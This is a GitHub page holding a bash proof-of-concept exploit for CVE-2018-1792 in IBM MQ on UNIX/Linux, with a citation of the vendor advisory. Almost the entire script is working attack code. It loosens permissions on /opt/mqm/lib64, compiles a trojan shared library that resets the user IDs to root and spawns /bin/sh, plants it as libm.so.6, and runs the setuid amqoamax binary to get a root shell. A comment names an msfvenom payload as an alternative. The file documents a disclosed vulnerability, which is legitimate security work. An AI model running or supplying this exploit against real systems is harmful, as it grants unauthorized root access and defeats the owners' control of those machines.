Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

51 lines (43 sloc) 1.26 KB
#!/bin/bash
# Author: Rich Mirch
# CVE: CVE-2018-1792
# Vendor Advisory: https://www-01.ibm.com/support/docview.wss?uid=ibm10734447
# Product: IBM MQ mulitple versions for UNIX/Linux
# Description:
# The amqoamax and amqoampx setuid root binaries are vulnerable to shared
# object injection because the RUNPATH is set to /opt/mqm/lib64 which is
# owned by the mqm user. This PoC will create a trojan horse library that
# executes a root shell when loaded.
#
# Note: This PoC uses libm.so.6 however other libraries can be used
#
# Usage: Execute as the mqm user
#
#set -x
SRC=$(mktemp).c
DST=/opt/mqm/lib64/libm.so.6
# /opt/mqm/lib64 is 555 by default
[[ -w /opt/mqm/lib64 ]] || chmod 755 /opt/mqm/lib64
# You can also use
# msfvenom -p linux/x64/exec \
# PrependSetgid=yes \
# PrependSetuid=yes \
# CMD=/bin/bash \
# -f elf-so > >/opt/mqm/lib64/libm.so.6
cat >${SRC?}<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
setregid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
gcc -fPIC -o woot.o -Wall -c ${SRC?}
gcc -Wall -shared \
-Wl,-soname,$(basename ${DST?}) \
-Wl,-init,woot -o ${DST?} woot.o
echo "Executing amqoamax; note: amqoampx will also work"
/opt/mqm/bin/security/amqoamax
rm -f woot.o ${SRC?} ${DST?}
You can’t perform that action at this time.